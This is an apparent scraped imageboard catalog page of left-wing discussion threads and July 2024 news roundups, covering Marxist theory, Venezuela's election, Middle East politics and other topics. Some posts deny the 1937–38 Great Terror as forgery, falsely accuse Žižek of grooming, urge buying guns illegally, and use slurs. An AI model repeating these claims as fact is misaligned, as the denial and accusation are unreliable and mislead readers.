The Islamic Revolutionary Guard Corps (IRGC) has extended its military-security exercise in the Quri Qaleh and Piaz Dol highlands of the Shaho Mountains in Kermanshah Province, which began on 17 July, by three days, the Kurdistan Human Rights Network (KHRN) reported.

French police arrest ultra-left activist over pre-Olympics railway sabotage as new incident hits phone lines
French authorities have arrested an activist from an ultra-left-wing movement at a site belonging to national rail operator SNCF, days after sabotage attacks paralyzed the network at the start of the Olympic Games, a police source said Monday. The man was detained at Oissel in northern France on Sunday and had access keys to SNCF technical premises, tools and literature linked to the ultra-left, said the source, asking not to be named.

Palestine Action protest council's failure to evict an Israeli arms manufacturer
PALESTINE supporters left a council headquarters with smashed windows and covered in red paint in protest at its failure to evict an Israeli arms manufacturer. Volunteers from Palestine Action mounted the attack on Somerset Council’s County Hall building in Taunton on Monday.

Tamil Nadu: CPI(M) to hold rail roko protest against Union Budget
Communist Party of India (Marxist) leader and Madurai MP Su Venkatesan said that the party will hold a rail blockade protest on August 1 against the lack of funds allocated to Tamil Nadu in the Union Budget 2024-25.

Skyrocketing power bills draw protests near Pakistan’s capital
Protests over skyrocketing power bills shut down a major road into Pakistan’s capital on Monday as some 3,000 supporters of a major Islamist party continued a sit-in despite pouring monsoon rains.

Sri Lanka president fails to get backing of largest party for re-election
Although the SLPP decision is a blow to Wickremesinghe, it does not take him out of the race entirely, as he is contesting as an independent candidate and a breakaway faction of the SLPP and other opposition parties could end up supporting him.

President Milei renews his vow to scrap export taxes as Argentina’s powerful farmers get impatient
The country’s powerful agricultural producers say they’re willing to give the libertarian more time to deliver on his free-market promises. But many farmers are disillusioned that seven months into Milei’s presidency, they remain hobbled by labyrinth currency controls, crushing export taxes and an uncompetitive exchange rate.

Stark split in world reactions to disputed Venezuela election
Reactions to the announcement that President Nicolas Maduro has won a third term in Venezuelan elections illustrate the globe’s deep divisions. Venezuela’s electoral authority declared on Monday that Maduro had won the race with 51 percent of the vote. However, the opposition says that their candidate, retired diplomat Edmundo Gonzalez, took about 70 percent.
R: 39 / I: 6


>kicked out the Italians with little outside support
>took an absolutely illiterate and religious fundamentalist backwards society and boosted literacy to 80% of the nation complete with equal rights for women
>probably the most principled internationalist out of all the cold war communist nations
>knew that titoism was gonna make yugoslavia explode into a nationalistic shitfest
>the previous site was literally named after a memey thing he did
>not really talked about here anymore

why ?
R: 53 / I: 14
>Slave mode of production: Ended slowly over the course of a whole millennium (vidrel) without a successful slave revolution (though there were servile wars in which slaves were slaughtered)… continues to exist in illegal isolated pockets (human trafficking) and in certain legal forms (prison labor)
>Serf (feudal) mode of production: Ended slowly over the course of several centuries with some "bourgeois revolutions" here and there but a lot of countries just transitioned out of the mode of production through development without revolution. Continues to exist in certain isolated pockets but not really in the exact forms as medieval European serfdom.

<Wage labor (capitalist) mode of production: Is supposed to end with proletarian revolution and it's considered revisionist by many to suggest otherwise.

What is the law of historical development that proves to us that capitalism MUST end through revolution and will not fade away slowly over a long period of time the way the slave mode of production did? Who speaks most authoritatively on this matter?
R: 12 / I: 3
There are many potential forms of bourgeois class infighting that can be exploited by the working class in a divide and conquer strategy:

>nationalist bourgeoisie vs. internationalist bourgeoisie

>retail capital (transportation, arrangement in a market space and markup at point of sale) vs. industrial capital (production of essential and nonessential goods) vs. financial capital (fictitious capital, usury, and credit)
>short term bourgeois interests (profit NOW) vs. long term bourgeois interests (long term political stability of the capitalist system)
>private sector (chaotic markets) vs. public sector (subsidized and planned markets)
>bourgeois actors (capitalists) vs. bourgeois representatives (state officials)
>imperial core bourgeoisie (falling bourgeoisie) vs. periphery/postcolonial bourgeoisie (rising bourgeoisie)

Am I missing any categories? Are any of these categories redundant or overstated?
R: 30 / I: 6 (sage)
Single worst thing to happen for communism was when Joseph Vissarionovich was appointed as a general secretary of USSR. The movement never recovered from his tyranny.
R: 86 / I: 6

Third Worldism in the eyes of the Third World

Why do socialists who live in the third world tend to be the least third worldist nowadays? I'm an Iraqi and I have never met any communist in my life who supported, say China or Russia and definitely not Axis of "resistance" militas (personal guards of the bourgeoisie and ex-US cumrags)

The most active leftist party in Iraq, the WCPI (non-trot) goes as far as condemning Stalinism for its deviation from Marxism with stuff like socialist commodity production. Though the ICP is socdem now it too suffered from repression due to Soviet policy of supporting our national bourgeoisie.

I posit that because we experience the contradictions firsthand, we have a better grasp of our material conditions, so we pursue the only anti-imperialism we see viable, that is non other than unabashed anti-capitalism. Unlike a lot of our comrades in the west who have very little at stake in regards to our struggle, they tend to caricaturize it in the process, getting lost in geopol scuffles, dying on the front lines of reddit for their favorite petty bourgeois leader, advocating for collaborationism, reaction, etc. It would be the equivalent of us painting Biden as the vanguard of American revolution, blasting it everywhere, and shutting down any opposition in the name of lesser evilism.
R: 144 / I: 11

Should POland pay up reparations to Jews?

Many houses belonging once to Jews, stayed in Poland, for some reason. Should Poles pay reparations to Jews?

Verify this website as well:
R: 479 / I: 336

OC Thread 16.0

Thread dedicated to /leftypol/ original content.
>Post original content you've made, or OC someone else recently made which you want to share.
<Or ITT collaborate on improving content already made.

If your original content is good enough, it would most likely be shared on the /leftypol/ twitter account!
Make sure to follow us and feel free to leave suggestions on this thread~

previous thread: >>1465628
>>>/leftypol_archive/1465628 (if it gets archived by mods)

Leftypol memes and other undesirables:

R: 4 / I: 0

Great Terror canon


Lmao, out of 4 primary sources of 700 thousands dead due to communism in 1937-38, 1 is obvious fake signed by a person who didn't exist, 1 was (supposedly) made by a person shot in 1938, and 2 start Great Terror in 1936 i.e. in accordance to Nazi propaganda (while in 1936 the number of executed was actually the lowest)

Believers in 1937-38 Great Terror and mass murders are in shambles. All their proofs are either forgery or Nazi propaganda made by rabid anticommunists. But let's see idiots in this thread defend Nazi anticommunist lies while calling themselves communists who just want to admit to actually happened mistakes
R: 25 / I: 1

/H5N1/ Avian Flu

>Influenza A virus subtype H5N1 (A/H5N1) is a subtype of the influenza A virus, which causes influenza (flu), predominantly in birds. It is enzootic (maintained in the population) in many bird populations, and also panzootic (affecting animals of many species over a wide area). A/H5N1 virus can also infect mammals (including humans) that have been exposed to infected birds; in these cases, symptoms are frequently severe or fatal.

>In mammals, including humans, A/H5N1 influenza (whether LPAI or HPAI) is rare. Symptoms of infection vary from mild to severe, including fever, diarrhoea, and cough. Human infections with A/H5N1 virus have been reported in 23 countries since 1997, resulting in severe pneumonia and death in about 50% of cases. As of May 2024, 889 human cases had been identified worldwide, with 463 fatalities, giving a case fatality rate of around 50%; however, it is likely that this may be an overestimate given that mild infections can go undetected and under-reported.

>Since 2020, global outbreaks of avian influenza subtype H5N1 have been occurring, with cases reported from every continent as of May 2024. In late 2023, H5N1 was discovered in the Antarctic for the first time, raising fears of imminent spread throughout the region, potentially leading to a "catastrophic breeding failure" among animals that had not previously been exposed to avian influenza viruses.

A pandemic of avian flu among farm animals could be catastrophic; an inevitable consequence of the meat industry. And also there is he potencial of Human to Human transmission. Thoughts? Will the visible symptoms of avian flu (bleeding eyes) make it more difficult to ignore, unlike Covid 2019?
R: 28 / I: 2 (sage)
Anons, things are screwed in my country, Venezuela. Even though the counts show that the opposition won in a brutal way, the government doesn't want to admit it.

But that is not the worst part. Apart from the fact that in many voting centers people who are not pro-Maduro are not allowed to enter, the Colectivos (armed Chavista groups) are shooting and intimidating people.

There are injuries and one person is dead.
R: 8 / I: 1

The Psychology Inudstry

>Why so many Gen Zers and millennials have 'money dysmorphia' — even if they are financially better off than they realize

>We deserve better than neoliberal solutions to mental health problems caused by capitalism

>Scholars have recently taken to exploring neoliberal capitalism and its relationship to psychology and psychotherapy. Neoliberalism is defined by the authors as “a political and economic system in which capital goods are controlled for profit by corporations and private owners rather than by the state.” They write that it can be traced to the mid-1970s reorganization of capitalism in response to the economic crisis following the Great Depression, “specifically the crisis of capital and wealth accumulation.”

>“We begin by examining neoliberal governmentality and critiquing depoliticized and Individually-focused accounts of people’ s experience and ways of working with clients, prevalent within psychology and psychotherapy,” they write. “Second, we discuss the role therapy practice has had and could have in neoliberal capitalism.”

>“The neoliberal emphasis on individual choice may obscure the reality of institutional racism and sexism and reinforce the notion that something is wrong with clients rather than with the economic-political system itself,” they write. “The complicity of psychotherapy in the project of neoliberalism is reflected in therapy’s propensity to advance and legitimize some forms of knowledge over others.”

"Pathologize to depoliticize" seems to be the biggest part of this strategy. It seems like young people have been taught to psychologize their problems instead of solving them. This involves therapy, pills, and other expensive nonsensse that doesn't actually challenge the economic status quo. This strategy seems to becoming increasingly prevalent in the Western World and has disturbing similarities to the dystopia described in Brave New World, which was Aldous Huxley's best selling book from the early 20th century.
R: 18 / I: 4


What I’ve noticed while browsing the net, is that for the most part “dedollarization” as an event doesn’t matter.
What apparently matters more is the fact that people talk about dedollarization. I’ve seen many times how whenever you mention the word “dedollarization” you’re instantly attacked by multiple bots who claim that dollar has never been stronger, economy under Biden is the best it’s ever been and other crap trying to essentially shut down the conversation.

Is this because mentioning dedollarization can cause a snowball effect of some sort?
R: 3 / I: 1
the only privilege that meaningfully exists is class privilege. other marginalisations exist compared to class, but not other "privileges". punishing deviation from a group is not the same thing as actively rewarding said group.

may sound like nitpicking semantics but i think if you wish to call yourself socialist you should use precise terminology over wishy-washy liberal concepts. being a trans woman objectively makes my life harder, but a cis male proletarian isn't less exploited in return or anything.
R: 70 / I: 14
is it just me or didn’t seem like you have to be atheist to be a communist what’s your stance on atheism and and what’s your opinion on Abraham religion?
R: 9 / I: 0

Big party doesn't mean good party

Lenin came back from from beyond the grave to tell me to post this reminder that a large and influential party is not the same thing as a successful and revolutionary party.

(quotes are from "Lenin's Fight Against Revisionism and Opportunism")
R: 5 / I: 0  

Why did Zizek groom her?

Not only he is a glowie, he has also has 30 years pedophilic agegap with her. I bet he groomed her when she was under 18.
R: 4 / I: 2  
yea so i just wanted to get on 420chan but it redirects here and i cant find a weed board so im just gonna post this here
last week ive seen a "red spider" running around in my aldi bag of earth and didnt think anything of it apart from "neat a red spider!"
boy was fast af by the way
the next day i see it sit right on my cannabis plant and that immediately made me suspicious
so i asked chatgpt what it might be and it told me its probably a spider mite and that theyre a quite dangerous pest
i went right ahead and squashed that little fucker
it seems like in that one day the spider mite could already do quite some damage leaving small grey spots on my stem and brownish larger spots on the leaves along the veins
the affected leaves (lowest two nodes) are a quite droopy too
i kept a close eye on my plant and im pretty sure there are no further living spider mites currently on my plant but it seems like the spots are increasing in number
im wondering was it really the spider mite? was that thing even a spider mite? from what i could gather spider mites are tiny and while the thing ive seen was quite small it was big enough that i could see it high speed running around on the bag of earth when i was standing upright and the bag was on the floor
also the fact that it was so incredibly fast for such a small animal struck me as weird
i am aware that my plants are also infested with thrips but i think i got them under control with neem oil
pic related my plant
im going to get the strongest chemical pesticide i can find next week and hope my plant can recover but its really a shame because this is a trifoliate and it has been growin so nicely so far
i still have other healthy and strong plants but theyre regular ones and i really wanted to take care of my trifoliate…
R: 6 / I: 2

News 7/26/24

Palestinian and Israeli Communists meet to coordinate struggle against war and occupation
The meeting stressed the urgent issues and tasks, prioritizing collective efforts and intensifying the joint struggle to stop Israel’s aggressive war and the genocide it is committing. Lifting the siege on the Gaza Strip, opening its crossings and securing the food, health, and housing needs of its people was identified as an immediate necessity. The return of the displaced, the complete withdrawal of Israeli forces from the Strip, and the curbing of all its crimes in the occupied Palestinian territories rounded out the list.

Palestinian Resistance Forces Injure Three Zionist Soldiers in West Bank Shooting Operation
The Zionist occupation forces have closed off the entrances to the city of Qalqilya in the northern West Bank and sent in military reinforcements following a shooting incident that left several Zionist soldiers injured.

'Gambling With Hostages' Lives': Senior Israeli Negotiator Says Netanyahu Knowingly Creating Crisis in Cease-fire Talks
"Netanyahu is knowingly trying to put the negotiations in crisis because he thinks he can improve positions. He has hinted to that effect in recent conversations. That's taking an uncalculated risk with the hostages' lives," one senior negotiator told Haaretz.

Algeria denounces France's support for 'Morocco sovereignty' over disputed Western Sahara
On Thursday, 25 July, Algeria expressed "great regret and strong denunciation" over the French government's decision to recognise an autonomy plan of the Western Sahara region "within Moroccan sovereignty." "Algeria was informed of the decision by France in recent days" declared the Algerian Foreign Ministry in a press release, adding that Algeria would hold the French government fully responsible for any consequences resulting from this decision.

South Africa police say 95 Libyans detained at suspected military camp
“The site was said to be a training camp for a security company, but it is a military base by the looks of things,” he said, adding that the owner of the security company was a South African national.

Left parties want resignation of AL govt
Leaders of left-leaning and progressive political parties on Friday at a rally in Dhaka demanded resignation of the Awami League government for killing more than 200 students and people controlling protests of the students demanding reforms of the quota system in government jobs.

Sri Lanka will hold presidential election on Sept. 21, its first since declaring bankruptcy in 2022
Wickremesinghe is expected to run while his main rivals will be opposition leader Sajith Premadasa and Anura Dissanayake, who is the leader of a leftist political party that has gained popularity after the economic debacle. It will be the first election in the South Asian island nation after it declared bankruptcy in 2022 and suspended repayments on some $83 billion in domestic and foreign loans.

French rail network paralysed by vandalism ahead of Olympics opening
FRANCE’S high-speed rail network was hit on Friday with widespread and “criminal” acts of vandalism including arson attacks, paralysing travel to Paris from across the rest of France and Europe. The attack came only hours before the opening ceremony of the Olympics and as workers took strike action at a five-star Paris hotel where Games officials are staying.

‘Austerity is not the answer’ as Reeves to announce £20bn black hole in public finances
CHANCELLOR Rachel Reeves is set to announce the existence of a black hole in public finances to the tune of £20 billion on Monday, party sources said today. She will give an update on a spending audit by Treasury officials and respond to the public-sector pay recommendations as the government faces having to find money for above-inflation rises.

Teenage suspect remanded over murder of Ukraine nationalist lawmaker
Farion, a language professor, had served in Ukraine’s parliament for the ultra-nationalist Svoboda party and became well-known for calling out public figures for speaking Russian instead of Ukrainian.

US may 'calibrate' Venezuela sanctions policy post-election, officials say
The Biden administration will "calibrate" its sanctions policy towards Venezuela depending on how the high-stakes election unfolds in the OPEC nation on Sunday, U.S. officials said, signaling that Washington could ease punitive measures if President Nicolas Maduro holds a fair vote. But the U.S. also put Maduro on notice that if he claims victory without providing proof, it would "call into question" whether the international community should accept the outcome.

Top leaders of powerful Sinaloa drug cartel arrested in Texas
The attorney general, Merrick Garland, announced the charges against cartel leaders Ismael Zambada García, known as “El Mayo”, one of the group’s co-founders, and Joaquin Guzmán. Both men face several charges in the United States for allegedly leading the cartel’s criminal operations.

Secret DEA files show agents joked about rape in a WhatsApp chat. Then one of them was accused of it
A group of U.S. Drug Enforcement Administration agents boasted in a WhatsApp chat of their “world debauchery tour,” shared lurid images of their latest sexual conquests and at one point even joked about “forcible anal rape.” Within months of that jaw-dropping exchange, an agent in the group chat was accused of that very crime.
R: 9 / I: 0

Silvio Gesell

What is your opinion on the relatively unknown Silvio Gesell

He was against Marxism and would probably more categorized today as a market socialist or more in line is mutualism.

His main critique of capitalism was primarily in the monetary system and not in the means of production, he posited that money holds a contradictory role as both a means of exchange and a store of value hence he suggested money have a demurrage or be subject to a decaying cost similar to other styles of goods.

He also suggested free land (nationalizing all the land and all usage must be leased, a left wing version of georgism ) and free trade creating what he called the free economy

He is somewhat relevant to the socialist movement because of his very brief involvement in the bavarian soviet republic (for only 7 days til he got arrested)

I think his ideas are intriguing, certainly the more orthdox marxists on here will criticize this for preserving market logic and wage labor but what do you guys think overall of this generally forgotten figure.

Further reading can be found in his magnum opus: The Natural Economic Order
R: 125 / I: 12

On Legitimate Violence and Dehumanisation

Sme parts of the Western left are misguided in their view on violence as it results to Israel Palestine, especially as they themselves are beneficiaries of imperialism.

There is a current of thought that says 'all Israelis are legitimate targets of decolonisation' and that there is 'no such thing as a "good" Israeli' I believe this thought to be hypocritical and reactionary when it comes from the western left.

Just to clarify, I am a supporter of Palestine and have marched dozens of time and participated in direct action in my country in support of the cause. I am against the Israeli state and want to see a ONE STATE Solution.

However I do not believe that all Israeli's are uniquely evil or complicit. Because I (and a lot of you reading this) are part of the Imperial world order and a labour aristocracy that has benefitted from crimes against humanity. IF YOU LIVE IN THE WEST, YOU ARE EQUALLY AS COMPLICIT.

Yet as firm believer in dialectical and historical materialism, I see the possibility for change, even in the heart of the imperial core. The left in the west is pathetic and complicit, but I don't think that makes them irredeemable either. If we don't believe in transformation that why do we fight?

So, for that reason, I don't see ALL Israelis as targets either, nor do I dismiss the fact that there are good people in that country, who like leftists in the west, have been smothered by a fascist regime.
R: 5 / I: 0

News 7/27/24

Labour drops challenge over Netanyahu arrest warrant
CAMPAIGNERS welcomed Labour’s decision to finally drop a legal objection to an arrest warrant for war criminal Benjamin Netanyahu today. But pressure continued to mount for a full arms embargo, as rumours circulate that Labour is considering arms restrictions on Israel.

Resistance Confronts Occupation in Khan Younis, Attacks Commence on American Forces in West Asia
Reports state that the eastern part of Khan Younis was witnessing intense confrontations between Resistance fighters and occupation forces besieging dozens of families in the Bani Suhaila area. The Resistance was attempting to break the Zionist battle lines and provide safe passage for the families to escape the military siege.

Turkey and KDP gave citizens 9 hours to evacuate 4 villages in South Kurdistan
Social Peace Building Teams (CPT) member Kameran Osman explained that KDP officials in the Amêdiyê region put pressure on citizens in the villages of Mijê, Kevne Mijê, Spîndarê and Gîrgaşê in the Ber Garê region to go to their villages between 08:00 and 17:00, and then to completely evacuate their villages and go to the places specified to them.

Top pilots’ union sounds alarm as regulators consider smaller crew sizes
EASA is looking at the safety of extended minimum crew operations (eMCO), where one pilot would leave the flight deck to rest during long flights, leaving one pilot at the helm. While many long-haul flights currently staff three pilots on the flight deck, so that pilots can alternate rest, eMCO would eliminate this standard.

Polish MPs allow security forces to use arms with impunit
The pan-European rights body Council of Europe and other activists had expressed concern that the police, border guards and soldiers would now be able to act — or even kill — without accountability.

Key Pakistani Islamist party begins sit-in to protest increase in electricity bills
Naeem-ur-Rehman, who heads Jamaat-e-Islami Pakistan, told demonstrators in Rawalpindi that he was willing to stage the sit-in even for weeks. He said police arrested a large number of the party’s supporters to prevent them from staging the sit-in in Islamabad.

IT workers in India fight back against proposed increase in working hours
The state government plans to amend the Karnataka Shops and Commercial Establishments Act, 1961, which currently caps work hours at 10 per day, including overtime. The proposed law would allow IT, ITes (Information Technology Enabled Services) and BPO companies to extend work hours beyond 12 per day, with additional hours not exceeding 125 in three consecutive months.

From Ang Bayan: NPA Unit Kills 3 AFP Soldiers During Clash In Oriental Mindoro Province
The New People’s Army (NPA)-Mindoro (Lucio de Guzman Command) thwarted the AFP’s 203rd IBde attack on one of its units in Sityo Lukban, Barangay Panaytayan, Mansalay, Oriental Mindoro Province on July 11. NPA-Mindoro reports killing three and wounding others of the 203rd IBde soldiers in battle.

Rebel coalition in Mali claims to have killed dozens of soldiers and Russian Wagner mercenaries
On social media, amateur videos showed the lifeless bodies of several white men and Malian soldiers scattered on the ground alongside destroyed vehicles. The rebel claim came after the Malian army issued a statement Friday night saying two soldiers had been killed and 10 wounded in a rebel attack that also disabled two armored vehicles and two pickup trucks.

Amnesty calls for Sudan-wide arms embargo
The ongoing war in Sudan is being fuelled by a constant flow of weapons into the country, Amnesty International said today in a new briefing. The report identified weapons produced by China, Russia, Serbia, Türkiye, the United Arab Emirates and Yemen, being used by the warring parties in Sudan.
R: 16 / I: 2

Capitalism and freedom

Are there any works (books, articles) that elaborately debunk the framing that capitalism = freedom and socialism = tyranny? Specifically honing in on believing capitalism is the epitome of freedom. Or what arguments can you come up against that yourself?

It appears to me that when it comes to so called freedom under capitalism there is
>meaningless choice (red cereal #26 or blue cereal #13)
>theoretical freedom („you can switch jobs if you don‘t like it!“ labor market is bad and you face the same fundamental problems at another job)
>I am unfree regarding anything that is at the core of capitalism (can‘t decide over what happens to my surplus labor value, I am not actually free to protest my boss cause he will try to get rid of me)
>decrease in existing freedom (capitalists perpetually seek to squeeze workers to their last drop, forcing them to work more just to have less than before)
>the withholding of basic needs forces me to work more, when otherwise I could have done more if my needs were guaranteed
>more freedom is attained with more money, making some people freer than others merely by being born privileged

What else is there?
R: 104 / I: 22

Pan-Arabism vs Socialism

Do you know Salah Jadid?
He was a Ba'athist Arab nationalist turned far-left socialist who ruled Syria for a relatively short period before being overthrown by Assad senior in a coup.
Unlike his Ba'athist contemporaries Jadid believed in class struggle, implemented radical leftist policies, assigned communists to high positions in his government, pursued close relations with the CPSU, shifted the party line from Arab nationalism to explicitly revolutionary anti-capitalist stand treating pan-Arabism as merely a means to an end (that is socialism) rather than an end itself.
After his overthrow Assad started reversing many of his policies, liberalizing the country while cracking down on leftist opposition.

Assad Senior was an absolute buffon who wasn't committed to the Palestinian cause or socialism as he criticised Jadid for his support of Palestinians during their revolt against the Jordanian monarchy, gave the Golan on a silver platter to Israelis, funded counter revolutionaries in the Lebanese civil war, supported an expansionist theocracy in his sectarian scuffles, made a deal with the US to occupy Lebanon in exchange of supporting the Gulf War, started neoliberalizing Syria's economy in the 90s.

The only other head of state that was to the left of secular pan-Arabism is Iraq's Qasim, he to was overthrown by nationalists. As a leftist MENAoid I believe Arab nationalism has been a net negative for our region. It is a revisionist (historically and ideologically), colonial, reactionary ideology that had been used primarily to suppress class consciousness and recuperate socialism and revolution to serve bourgeois interests.
R: 62 / I: 8

why should I care about gun control?

If you want to make revolution, just buy the guns illegally.
>But what if you get caught?
I have nothing to lose. I can get caught for any other reason.

Communists gave nothing to lose. We are willing to fight and die for what we believe. Rightoids need guns to be legal so they can form Klan cells without losing their jobs as boat dealership owners..
R: 5 / I: 0
original thread: >>>/siberia/548766

I'm trying to understand how Egypt got where it is, and what should've been done before, during, and after the 2011 revolt. I'm looking for a deep leftist analysis on the topic, not from an outsider's POV hopefully.
R: 128 / I: 9
Give me a single fucking reason why in the year of 2024 it‘s acceptable that people are still braindead drones with no class consciousness and no understanding of Western imperialism when the internet has made access to all books incredibly easy and free. Go on and tell me how this isn‘t an indictment in how hopelessly retarded a majority of people in the West are.
R: 1 / I: 0

I don’t follow western politics at all.

Is this the British version of the Kenyan antigovernment protests? Are British people standing up to their federal government to demand less corruption and economic reforms that favour productivity and social security over austerity and cronyism?
R: 74 / I: 15
You claim to be left-wing but follow the same ideas as cultural capitalism, how pathetic.
R: 9 / I: 0

4d chess or retarded ?

>triple down on a retarded nationalist policy implemented by mao and try to fuck over the ussr as much as possible
>fund pol pot to fuck over vietnam
>fund liberal Vietnamese separatist groups to fuck over vietnam
>invade vietnam when your joint glow op with the us goes up in smoke
>send massive amounts of cash to the mujaheddin and start bringing exiled afghan dissidents (jihadists) into the xinjiang region resulting in terror attacks and china needing to reeducate the population
>pressured the ussr to open it's markets further during perestrokia which would crash the soviet economy
>all writings by him boil down to "i like good things and we should do more of the good things"

why do people here call him a genius ?
R: 38 / I: 9

On foreign volunteers in Iraq and Syria

if you ever wondered what the modern Weatherman/leftist Western revolutionary looks like, you have well-documented examples of foreign volunteers in Iraq and Syria. So I'm not going to pretend I was there, most of my information is from some documentaries and one autobiographical comic of a guy who volunteered. The actual soldiers, doctors, and engineers from Western countries were highly sought after. The doctors and engineers more so, and the real soldiers were used as instructors and occasionally worked with local units, but these guys were not the majority going,
So first off, the YPG was a Kurdish ethnic militia and it did not accept foreigners (which bummed out a lot of these guys). They had to join the SDF; in most cases, they did not have any skilled labor or military ability, so they were made to do grunt work in the liberated cities. They were also encouraged to post on social media to bring international attention. They felt like they were adding to the war effort and helping to kill fascists and the Kurds would gain some credibility. Despite that, there were culture clashes, this was still a Middle Eastern nation and these guys just could not read the room. Like organising a drag-show, They actually dissolved their international brigades because there were too many of these retards coming that didn't even want to do physical labor.

This is a documentary about a group of British and American soldiers who were actually fighting. They are respected, working with local forces and training with them on the ground.
The one is a podcast about the 'anarchists' in Rojava. most of it was just willful denial on their part.
The is the comic I mentioned.by a volunteer who was made to do grunt work.
R: 413 / I: 128
An intriguing thread which explores why the general public often fails to grasp the true essence of a 'bad' character and how often leftists unintentionally undermine themselves by portraying said characters with qualities that appeal to the average person
R: 41 / I: 3

What's the problem with "moralism"?

I've heard that term used in a derogatory manner on here several times, so I wanted to ask why. What's your definition of "moralism" and why exactly is it bad? It seems like arguing on the basis on morality at all is replied with the accusation of "moralism". so morality and moralism seem to be equated here. What gives?
R: 1 / I: 1

Books on Soviet Economic Hist from Marxis Author

Looking for comprehensive books on Soviet economic/planning structure from actual Marxists. Except for Dobbs, I keep getting recs from bourgeois authors.
R: 23 / I: 5
There's not a literature board here so I will post this here - How would have Lovecraft's political views advanced if he lived through world war 2 up until about Vietnam or so?
He's known for being a nazi but towards the end of his life he did a political 180 and switched to being a social democrat when his aunt's money ran out and he couldn't find a job, he also started tettering towards communist ideas in general.
R: 34 / I: 4

On august 1st an “African Spring” will commence

Since the beginning of Kenya’s recent anti corruption protests, Nigeria and other African governments experiencing high levels of corruption and mismanagement are seeing their citizens begin to organize nation-level protests to force restructuring, transparency, and anti-imperialist purges. Nigeria will be the second major hotspot for the next antigovernment protest. The protests are set to begin on august 1st starting in Lagos.
R: 5 / I: 0

The Digitization and digital transformation of things is headache inducing

If you live in a “developed” country, you’re probably used to the idea of constantly feeling stupid whenever asked to use a machine or printed papers to transfer information about necessary things. Things like applications, medical forms, insurance, those kinds of things are what I’m referring to. If you do feel stupid, don’t be, because there’s a guaranteed chance that the machines themselves are the problem and not the users. There are so many badly out together pieces of software that are missing features, information, details, updates, and more that are never implemented into the digitized tools you may use today.
Examples of this shit in software are numerous: Consent forms that forget to include all the information about what a user is consenting to; job postings that fail to provide information about data collection and privacy; instructional guides that are either completely outdated for a real piece of machinery; convoluted UIs that are completely inaccessible to their users; IT and customer services team members themselves consistently failing to read the emails people send them; software implemented in some form of public service that didn’t even need or benefit it to begin with that will go on to cause problems with accessibility, security, or stability; or sometimes shit just fucking breaking for the sake of it.
You would think that these universally experienced problems would make most people that work that work in tech take more responsibility over handling their work whenever their products fucking fail. However, the dumbass IT teams that make these tools can always run under the excuse that their users are too stupid to use them effectively even when it’s obvious that the users aren’t the problem in spite of the rate of digital illiteracy present. One has to wonder how much tech will matter in the future because of how badly put together most “practical” software are.
R: 14 / I: 2

What did she mean?

<The move from a structuralist account in which capital is understood to structure social relations in relatively homologous ways to a view of hegemony in which power relations are subject to repetition, convergence, and rearticulation brought the question of temporality into the thinking of structure, and marked a shift from a form of Althusserian theory that takes structural totalities as theoretical objects to one in which the insights into the contingent possibility of structure inaugurate a renewed conception of hegemony as bound up with the contingent sites and strategies of the rearticulation of power.

Can someone with a thesaurus and an encyclopedic knowledge of 20th century french post-modern and structuralist philosophy explain what the literal fuck this means?
R: 48 / I: 12

Things commies did for you

What would you consider the major achievements of communists for the proletariat so far?
I'm using this for agitprop so please try and prefer achievements which a liberal would acknowledge were achieved, by communists. Bonuses for things a communist government did first and Western governments later conceded, like the 8-hour day*, free access to abortion.

Doesn't have to be done by a government, but try to avoid blindly claiming that the whole labour movement were communists.
R: 77 / I: 15

Materialism is an excuse for a lack of creativity.

Time and time again i find myself arguing with brick walls. People who get too into semantics when i try to present something new, people who tell me it's impossible, people who tell me to be pessimistic. Well guess what? i'm a Utopian Marxist. I consider myself a materialist too, but you dull beady-eyed wannabe-bureaucrats ruin it for everybody. I don't want to say it's a behavioral pattern that is exclusively for MLs, but they always seem the most affected by Capitalist Realism. These are revisionists, they don't believe in cybernetic economic planning, they don't believe in left agorism, they don't believe in conscription-stratocracy, they don't believe in really anything positive or Utopian at all. When they talk about socialism, they talk about an abstract concept that is unattainable, and unattainable ideal. This is a cucked form of Marxism, an Ascetic Marxism. In other words, it is a Marxism of spiritual Austerity. A perverse, bourgeois Marxism designed to instill pessimism in the proletarian masses. These are CIA-aligned bad-faith agents and i believe a purge is in order. Not only a purge of people like this, but also a purge of the Liberal atmosphere that has overtaken this decaying website. Ideological dead weight is all most of you uninspired cretins really are.
R: 69 / I: 12
>buy this
>read orwell rant on the start
>he is whining and moaning about UK press, privates, public and intellectual enviroment glazing Stalin and the Soviets
So um, why britain never left capitalism?
R: 59 / I: 22

The Communist is the sublation of the Capitalist

When you understand the primacy and importance of the development of the productive forces, and the role that capital in itself has in revolutionizing society, you're able to adopt the proficiency of the Capitalist while shedding his narrow limits.

When a Capitalist employs capital he does so with primary concern for his individual being or interests. The advancement of the productive forces is an incidental byproduct of his activity. He uncovers all of these new ways of managing his businesses for the sake of efficiency.

But his limit is reached in the monopolistic stage, when there's no drive to improve or update, and there's more of a reason to hold back the development of others or employ regressive means of production and management because it saves on costs and there's no competition to spurn you forward.

The principle contradiction of capitalism is thus achieved. The overwhelming majority of society's labor is operated socially yet the fruits of labor is held in private hands, directed in private hands, and owned by private hands - society's elite minority acting as private citizens with 0 social obligations.

Thus the capitalist and the system of capital became a retarding, retrogressive force, a fetter on the world.

The Communist on the other hand recognizes two truths: the potency of the proper management of capital to advance the productive forces, and the necessary resonance between social relations and the productive forces.

Whereas the Capitalist wishes to halt the wheel of progress for fear of losing his social position, the Communist not only wishes for the wheel to move forwards regardless of the sacrifice, but to accelerate that wheel.

Instead of capital and scientific management of the workplace being employed for capital's own sake - profits for profit's own sake, the Communist will employ capital and scientific management for social need, for the common good, for society's sake.

This isn't done out of "moralism" or the goodness of the heart of the Communist, but out of a sober, objective recognition that society as such can not sustain the primacy of the logic of capital any longer - capital must be contained and controlled by social need, for social need, and from that containment capital, or rather the productive fruits of capital, will be freed.

When capital is freed from the Capitalist, a new golden era of humanity can finally flourish, and it can only be freed via the socialization of the means of production and the fruits of its labor.

In the mean time, the working class already feels the pressure of the contradictions of capitalism. He sees his country rotting and crumbling. He knows that a crisis is on the horizon and is unsure if his home will survive the next few storms. And yet he *wants* control and ownership of capital, of the means of production, and the means to secure his livelihood. But he is denied, surrounded by walls.

Once the storm comes and the walls begin to crumble and crack, he *will* attempt a breakout.

This is where the Communist comes into play. He is scarier than the Capitalist because he is willing to topplllee every single wall in the name of human progress, all while scientifically learning *how* the Capitalist operates and using those lessons as a starting point to break down the next wall and the one after it.

The Communist is outdoes the Capitalist in being a capitalist. He understands capitalism better than the Capitalist. He manages people and employs capital more effectively than the Capitalist.

The Communist learns from the Capitalist, then out-competes him and compels the titan of industry to become pillars of society.
